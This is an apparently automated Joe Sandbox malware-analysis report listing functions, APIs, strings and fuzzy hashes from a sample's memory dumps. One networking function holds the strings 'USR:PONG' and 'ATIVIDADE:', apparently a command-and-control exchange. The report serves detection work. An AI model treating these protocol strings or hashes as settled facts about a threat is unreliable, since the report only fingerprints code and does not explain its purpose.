Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 25-11 C1
API String ID: 3215553584-2243052442
Opcode ID: d44736d84433258140fe7ef4dfd4140d149285e3efcdfca84c6903896e25e767
Instruction ID: 64296e9d2166cf43ac17b55e07cbb060b6efdd41e7b1d5fe1122a642ee3cd545
Opcode Fuzzy Hash: d44736d84433258140fe7ef4dfd4140d149285e3efcdfca84c6903896e25e767
Instruction Fuzzy Hash: 4EA1A532604E4889F7A28E15C4D03ED37A1B749BDEF5AC116EA9A473D4DF38CA498349

Function 0000000180004F20 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 0000000180004F6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000526F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000527B

Strings

.exe, xrefs: 00000001800051C0

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileModuleName
String ID: .exe
API String ID: 822243234-4119554291
Opcode ID: 5df9d5559cd0ba863b72baf3f166c520219cf5cc5eb55cc11fdf0e48a6177c73
Instruction ID: 41bcb1ea40114d2c640267b9a60c9298e5aa45a848a6fe917d007320674690c0
Opcode Fuzzy Hash: 5df9d5559cd0ba863b72baf3f166c520219cf5cc5eb55cc11fdf0e48a6177c73
Instruction Fuzzy Hash: DC919C72214B8881EB56CF25E4543DE7762F789BD4F409115EA9E07BEADF78C288C740

Function 00000001800514AC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018005178B

Part of subcall function 000000018005BBD8: _invalid_parameter_noinfo.LIBCMT ref: 000000018005BBF5

Strings

UTF-16LEUNICODE, xrefs: 0000000180051729
UTF-8, xrefs: 000000018005170A
ccs, xrefs: 00000001800516C6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: ecefb4484884b98146c1d34a82a7fc52f0f55acf10090cf54ed10f66b1538264
Instruction ID: 979bcf749651fb45a8a66f801b95c26ab57ea13a6d79a1e750c42efeb57e5d39
Opcode Fuzzy Hash: ecefb4484884b98146c1d34a82a7fc52f0f55acf10090cf54ed10f66b1538264
Instruction Fuzzy Hash: 7F817C766046088DFBE79F2982543F92AA0E31DBCAF59C005FA02772D5DB3BCB499741

Function 00000001800511E8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180051491

Part of subcall function 000000018005BDBC: _invalid_parameter_noinfo.LIBCMT ref: 000000018005BDD9

Strings

ccs, xrefs: 00000001800513DD
UTF-8, xrefs: 0000000180051414
UTF-16LEUNICODE, xrefs: 0000000180051435

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: e9e8afc6f53e05ea93da41477fb6d107356d33d1d0be80143f80a846450e1d39
Instruction ID: 6ff3e75659c3e55af41f7dabf2fd75cb8f841f3ad586bdeb67455ae50a255f07
Opcode Fuzzy Hash: e9e8afc6f53e05ea93da41477fb6d107356d33d1d0be80143f80a846450e1d39
Instruction Fuzzy Hash: 1481C13250424C9DF7E74F2882643FC2BA0A31E7CAF59E005FA02B6AD5DA678B4D9701

Function 00007FFE1A52BA2C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A52BCD5

Part of subcall function 00007FFE1A5300E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A530105

Strings

UTF-8, xrefs: 00007FFE1A52BC58
UTF-16LEUNICODE, xrefs: 00007FFE1A52BC79
ccs, xrefs: 00007FFE1A52BC21

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: e33a420ba7976ad6fe459ee5cb21d905e7e011a473ac439e9a790722a59750e7
Instruction ID: a51078338c76f3e6c1021f230f3e544d320362c500f1fb87269147e2a4806c19
Opcode Fuzzy Hash: e33a420ba7976ad6fe459ee5cb21d905e7e011a473ac439e9a790722a59750e7
Instruction Fuzzy Hash: A681C632F0CA03C6F7654EAB81542782BA29F57F74F5690F3DA4E522B9CE2DA8419301

Function 000000018003D05C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000000018003D0CC
_CallSETranslator.LIBVCRUNTIME ref: 000000018003D117

Strings

RCC, xrefs: 000000018003D0E8
MOC, xrefs: 000000018003D0E0

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 18f9893a96108d9f72480f9f65dbc678b8cd6a1f9e8bb78b0f88b8e1bc3b92f5
Instruction ID: 435210d7e5a00e835df7c2e5aea95dfbec5f0f07fd43dc199a532b1a61f595fe
Opcode Fuzzy Hash: 18f9893a96108d9f72480f9f65dbc678b8cd6a1f9e8bb78b0f88b8e1bc3b92f5
Instruction Fuzzy Hash: 80918E73604B888AE792DF65E8803DE7BA0F749788F15811AFA8957755DF38C299CB00

Function 00007FFE1A51B908 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A51B978
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A51B9C3

Strings

RCC, xrefs: 00007FFE1A51B994
MOC, xrefs: 00007FFE1A51B98C

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: b0ac866fa0dbee9fc9a3af9b8f1a28c8dc3aadd01e5f3e58964112f4f6f6fec6
Instruction ID: 792d206da1502dcfd2c7a351036b608ff2287067624f74c50216685cdf9a54eb
Opcode Fuzzy Hash: b0ac866fa0dbee9fc9a3af9b8f1a28c8dc3aadd01e5f3e58964112f4f6f6fec6
Instruction Fuzzy Hash: D791A073B08B858AE710CB66E8802BD7BB1FB45B98F1041BAEA4D17B65DF38D195C700

Function 000000018001FA60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001FADE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001FC3B
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001FC41

Strings

25-11 C1, xrefs: 00000001800202E5

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: 25-11 C1
API String ID: 3936042273-2243052442
Opcode ID: ecbb9414d82c01989342309e8a0f6ac103943d35888bfd4c8460458494f7ce81
Instruction ID: e65f274f199b208dcf7c51ec98b937aed721e8bf65d4b5d6fc6c73967711c4e1
Opcode Fuzzy Hash: ecbb9414d82c01989342309e8a0f6ac103943d35888bfd4c8460458494f7ce81
Instruction Fuzzy Hash: 2B41F472301B8C85EF66DB11E5443E96351E748BE4F988621FF6D07BD5DE78C6858340

Function 000000018003CE40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000000018003CE8C
_CallSETranslator.LIBVCRUNTIME ref: 000000018003CEDB

Strings

MOC, xrefs: 000000018003CEA0
RCC, xrefs: 000000018003CEA9

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 4475e5bfb2d7370b7e72ccce44926ced8c772bf03404c537295e38de4b0fff65
Instruction ID: 691aa6c2a294004dba8cfa5d85304ecf971532ed43a64c949ca032516c6686f9
Opcode Fuzzy Hash: 4475e5bfb2d7370b7e72ccce44926ced8c772bf03404c537295e38de4b0fff65
Instruction Fuzzy Hash: E4614837604A888AE766CF65E4807DE77A0F348BC8F058216EF4957B99DB38C659C701

Function 00007FFE1A51BE88 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A51BEB0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A51BF98

Strings

csm, xrefs: 00007FFE1A51BFEA
csm, xrefs: 00007FFE1A51BED2

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: def1be25ef736def65ebf84fa065a9901b8ca0f68225ef598c686eccc3a94595
Instruction ID: 0da727e63218a2b4f8e8929093e3c2256fff71be59dc347b7f5cec16e53c7867
Opcode Fuzzy Hash: def1be25ef736def65ebf84fa065a9901b8ca0f68225ef598c686eccc3a94595
Instruction Fuzzy Hash: 00516032B0CA8286EA648B23904437C77A2EB56FA4F1541F7DA5D877A5CF3DE490CB41

Function 00007FFE1A51B698 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A51B6F7
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A51B743

Strings

MOC, xrefs: 00007FFE1A51B70B
RCC, xrefs: 00007FFE1A51B713

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: a5dfd97b69c2a9c066756aebfee0b1c481693179eb2b5aadd403132ddcf560fe
Instruction ID: b0a6203c8ae31ab5467e66ed65ef063b9841653579b28863759e9f4c64d029af
Opcode Fuzzy Hash: a5dfd97b69c2a9c066756aebfee0b1c481693179eb2b5aadd403132ddcf560fe
Instruction Fuzzy Hash: 69619332A0CBC591DB219B16E4403B9B7A1FB85FA4F0446A6EB9C03B65DF7CD194CB00

Function 000000018003D5D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000000018003D5F8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000000018003D6E0

Strings

csm, xrefs: 000000018003D732
csm, xrefs: 000000018003D61A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 8b66eb1c9e7b6d1efe956b5768ba2059cc2c4a6c658d68adff472b47439b263c
Instruction ID: 9dc43542f946f632da72018e4295802bd75e7148ba8e9dabdae037ed44268b61
Opcode Fuzzy Hash: 8b66eb1c9e7b6d1efe956b5768ba2059cc2c4a6c658d68adff472b47439b263c
Instruction Fuzzy Hash: CB51CE3210428C86EBB78F11A54539A77A0F349BC8F1AC117EB9987BD5DF38D698CB00

Function 00007FF6B40A9C44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6B40A86C8: _errno.LIBCMT ref: 00007FF6B40A86D1

_errno.LIBCMT ref: 00007FF6B40A9C6F
_errno.LIBCMT ref: 00007FF6B40A9C8D
_getbuf.LIBCMT ref: 00007FF6B40A9CFA

Strings

, xrefs: 00007FF6B40A9C7A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno$_getbuf
String ID:
API String ID: 606515832-3916222277
Opcode ID: 5c789942bee5a3d92356d68a5b9e65523c6c2dfec1cad709a2b19a25e04944ed
Instruction ID: db81bc590cc62201405ac1dadcd06104ec21ef531f4b0abcf0f6b24a789cdfb2
Opcode Fuzzy Hash: 5c789942bee5a3d92356d68a5b9e65523c6c2dfec1cad709a2b19a25e04944ed
Instruction Fuzzy Hash: F241A0B2B18A0245EB289F2DD4C227C76A0EF84BA4F144635DB5D873D5DE3CE891C780

Function 0000000180020990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000001800209FA
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000000180020A42
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180020AD2

Strings

bad locale name, xrefs: 0000000180020AF5

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: c126650ccbc34851e988c0565f4dd324bfd289a2d170542772dc7ca92e0763f5
Instruction ID: 698fd70944d3e337a8e1af74c297ed93dc2774fbd7c7a3b01c021a1f6aa1bc00
Opcode Fuzzy Hash: c126650ccbc34851e988c0565f4dd324bfd289a2d170542772dc7ca92e0763f5
Instruction Fuzzy Hash: 9D415C32302B4899FB96DF70D4903ED33A4FB48B88F548024AE4927E56DF34C619D344

Function 0000000180020B10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180020B7A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000000180020BC2
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180020C52

Strings

bad locale name, xrefs: 0000000180020C75

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: 196934099c70dfe8323aa68ff8c19eda1f146fdb914775634a27818e2c012e8e
Instruction ID: 2fe8db9265e1c491b70a2ca0c197d8ed42c698fc047dfdf5bbb01efe422c0f1b
Opcode Fuzzy Hash: 196934099c70dfe8323aa68ff8c19eda1f146fdb914775634a27818e2c012e8e
Instruction Fuzzy Hash: 47414B32702B4899EBA7DFB0D4913ED33A4FB48B88F148524AE4927E56CF34C629D354

Function 00007FFE1A5169F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFE1A516A5B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FFE1A516AA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFE1A516B34

Strings

bad locale name, xrefs: 00007FFE1A516B57

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: 7f51ae627088769caa545475ec2237f00fd47cc14d73f37cff3455e90b8035a8
Instruction ID: c532c53b6493685b7786d493c9ef74a3b1d51193a252d725b80514cc78b269ae
Opcode Fuzzy Hash: 7f51ae627088769caa545475ec2237f00fd47cc14d73f37cff3455e90b8035a8
Instruction Fuzzy Hash: B6415822B0EA41D9FB14DF72D4902FC32A5EF85B18F0844B6DE4D26E69CE38D522E314

Function 000000018002A890 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018002A8FA
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000000018002A942
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018002A9D2

Strings

bad locale name, xrefs: 000000018002A9F5

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: 341e5e679924a93f6bb215b3d1d9f4da83ddb5e53069244bfb37708d968cc1d2
Instruction ID: ed6e89abfaf1b1195c7417a5b5d612edeee2bd8df2d5402f74f8d8b9362a5c87
Opcode Fuzzy Hash: 341e5e679924a93f6bb215b3d1d9f4da83ddb5e53069244bfb37708d968cc1d2
Instruction Fuzzy Hash: 74418D32306B48DAFB97DFB1D4903ED23A4EB48788F058425AA4927E55CE34C659D344

Function 000000018000CAD6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 0000000180008F23
send.WS2_32 ref: 000000018000CB21

Strings

USR:PONG, xrefs: 000000018000CAF2
ATIVIDADE:, xrefs: 0000000180008F9B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: recvsend
String ID: ATIVIDADE:$USR:PONG
API String ID: 740075404-1539886806
Opcode ID: 684a761dbe4effca03c1d61f3134934783fc367ea72557961182e06037fcd11d
Instruction ID: 1a9a3e31ebba70dc4dfe05531ccb7ff12174f93e0beac2903f44ea9de0108369
Opcode Fuzzy Hash: 684a761dbe4effca03c1d61f3134934783fc367ea72557961182e06037fcd11d
Instruction Fuzzy Hash: 91318F72204BC985EBB3DB30D8547EC3366E749BD8F408111AA5D4AAD9EF688388D301

Function 00007FF6B40A2518 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF6B40A2522
_lock.LIBCMT ref: 00007FF6B40A2550
free.LIBCMT ref: 00007FF6B40A2587

Strings

pWF, xrefs: 00007FF6B40A258C, 00007FF6B40A259A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _getptd_lockfree
String ID: pWF
API String ID: 3892346632-3254099572
Opcode ID: ccb48b811cc68f86e932ad4a1e59502905bcfdaefd7231ba7584db4663aa5609
Instruction ID: 9253557a77eb02b526f2ff432bbb0e18f2dd993626bd2cc91553258dbebd8722
Opcode Fuzzy Hash: ccb48b811cc68f86e932ad4a1e59502905bcfdaefd7231ba7584db4663aa5609
